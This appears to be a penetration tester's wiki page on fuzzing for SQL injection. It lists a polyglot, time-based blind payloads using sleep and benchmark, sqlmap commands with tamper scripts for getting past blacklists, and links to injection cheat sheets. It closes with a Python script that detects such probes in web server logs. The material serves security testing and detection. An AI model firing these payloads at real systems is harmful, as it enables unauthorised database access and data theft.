====== Tactical Fuzzing - SQLi ======

===== SQL Injection =====

Core idea: does the page look like it might need to call on stored data?

There exist some SQLi polyglots, e.g. (Mathias Karlsson):

<code>
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
</code>

Works in single-quote context, works in double-quote context, works in "straight into query" context!

You can also leverage the large database of fuzzlists from SecLists (https://github.com/danielmiessler/SecLists).

===== SQL Injection Observations =====

Blind is predominant; error-based is highly unlikely.

<code>
'%2Bbenchmark(3200,SHA1(1))%2B'
'+BENCHMARK(40000000,SHA1(1337))+'
</code>

SQLMap is king!

  * Use ''-l'' to parse a Burp log file.
  * Use tamper scripts for blacklists.
  * The SQLiPy Burp plugin works well to instrument SQLMap quickly.

Lots of injection in web services!

===== Best SQL injection resources =====

  * MySQL:
    * [[http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet|PentestMonkey's MySQL injection cheat sheet]]
    * [[https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/|Reiners' MySQL injection filter evasion cheat sheet]]
  * MSSQL:
    * [[http://evilsql.com/main/page2.php|EvilSQL's error/union/blind MSSQL cheat sheet]]
    * [[http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet|PentestMonkey's MSSQL SQL injection cheat sheet]]
  * Oracle:
    * [[http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet|PentestMonkey's Oracle SQLi cheat sheet]]
  * PostgreSQL:
    * [[http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet|PentestMonkey's Postgres SQLi cheat sheet]]
  * Others:
    * [[http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html|Access SQLi cheat sheet]]
    * [[http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet|PentestMonkey's Ingres SQL injection cheat sheet]]
    * [[http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet|PentestMonkey's DB2 SQL injection cheat sheet]]
    * [[http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet|PentestMonkey's Informix SQL injection cheat sheet]]
    * [[https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet|SQLite3 injection cheat sheet]]
    * [[http://rails-sqli.org/|Ruby on Rails (Active Record) SQL injection guide]]

===== Zseano/Drew SQLi Additions =====

**Time-based detection payloads:**

<code>
' or sleep(15) and 1=1#
' or sleep(15)#
' union select sleep(15),null#
'%2Bbenchmark(3200,SHA1(1))%2B'
</code>

**Polyglot (jhaddix):**

<code>
"SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
</code>

  * Legacy features and old code = most vulnerable targets
  * Test both GET and POST -- one method may be unprotected
  * Web services/APIs especially vulnerable
  * ''sqlmap -l burp.log --tamper=space2comment'' to parse Burp logs
  * [[zseano:sqli|Full Zseano SQLi Guide]]
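A defender-side check for the time-based payloads listed above, added here as an example (it is not code from this page or from the Zseano guide): it URL-decodes request targets from constructed access-log lines, flags delay primitives such as ''sleep()'' and ''benchmark()'' (extended to the PostgreSQL and MSSQL equivalents covered by the cheat sheets above), and uses a response-time field to separate a probe that merely arrived from one that actually delayed the server. The log format, the sample lines and all function names are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed access-log sample: combined format plus a trailing response time
# in milliseconds (as Apache's %D or nginx's $request_time would provide).
# Lines 2-4 carry the page's time-based payloads, URL-encoded as a browser sends them.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /item?id=42 HTTP/1.1" 200 512 18
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /item?id=42'%20or%20sleep(15)%23 HTTP/1.1" 200 512 15021
10.0.0.7 - - [01/Jan/2024:10:00:19 +0000] "GET /item?id=1'%2Bbenchmark(3200,SHA1(1))%2B' HTTP/1.1" 200 512 2310
10.0.0.9 - - [01/Jan/2024:10:00:22 +0000] "GET /search?q=SLEEP(1)%20/*'%20or%20SLEEP(1)%20or%20'%22%20or%20SLEEP(1)%20or%20%22*/ HTTP/1.1" 500 0 1009
10.0.0.5 - - [01/Jan/2024:10:00:23 +0000] "GET /about HTTP/1.1" 200 1024 12
"""

# client, method, target, status and the trailing duration field (assumed log layout)
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ (\d+)$')

# Delay primitives used by blind time-based probes: sleep()/benchmark() are the MySQL
# ones shown on the page; pg_sleep() (PostgreSQL) and WAITFOR DELAY (MSSQL) are the
# counterparts on the other engines the page's cheat sheets cover.
TIME_PROBE_RE = re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.IGNORECASE)


def decode_fully(s: str, rounds: int = 3) -> str:
    """URL-decode until stable, so %2B and double-encoded (%2520-style) input are unwrapped."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def find_time_based_probes(log_text: str, slow_ms: int = 1000) -> list[dict]:
    """Return one record per request whose decoded target contains a delay primitive."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed format
        src, method, target, status, ms = m.groups()
        probe = TIME_PROBE_RE.search(decode_fully(target))
        if probe:
            hits.append({
                "src": src, "method": method, "path": target.split("?", 1)[0],
                "marker": probe.group(0).lower(), "status": int(status),
                # a delay that was actually observed means the injection likely executed
                "delayed": int(ms) >= slow_ms,
            })
    return hits


if __name__ == "__main__":
    for hit in find_time_based_probes(SAMPLE_LOG):
        print(hit)
```

Matching the marker alone tells you a probe was sent; ''delayed'' being true on the same record is the signal worth paging on, because the server honoured the delay.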